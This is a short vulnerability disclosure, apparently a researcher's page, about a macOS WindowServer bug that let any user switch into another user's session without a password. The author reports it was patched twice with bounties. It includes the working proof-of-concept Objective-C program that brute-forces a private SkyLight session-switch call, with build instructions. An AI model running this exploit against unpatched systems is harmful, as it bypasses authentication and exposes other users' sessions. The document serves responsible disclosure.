SkyLight user session exploit
While working on
non-Metal acceleration in 2021, I stumbled on a WindowServer bug allowing any user to switch to another user's session without entering their password. Apple fixed the bug in macOS
11.6.1 and
12.0.1 and paid me a generous bounty.
Bizarrely, the bug was
reintroduced at some point in Ventura, and fixed again in late 2023, resulting in a second bounty payment.
thanks
ASentientHedgehog and
Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!
code
This is the program I submitted to Apple. It simply brute-forces
SLSSessionSwitchToSessionID
, which lacked the necessary checks. A real attacker would do something cleverer; session IDs are readily available in logs and other APIs.
// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing
@import Foundation;
void SLSSessionSwitchToSessionID(int);
NSDictionary* SLSCopyCurrentSessionDictionary();
extern NSString* kCGSSessionOnConsoleKey;
int main()
{
for(int guess=0;;guess++)
{
NSDictionary* dict=SLSCopyCurrentSessionDictionary();
if([dict[kCGSSessionOnConsoleKey] isEqual:@false])
{
printf("😁\n");
return 0;
}
dict.release;
SLSSessionSwitchToSessionID(guess);
}
}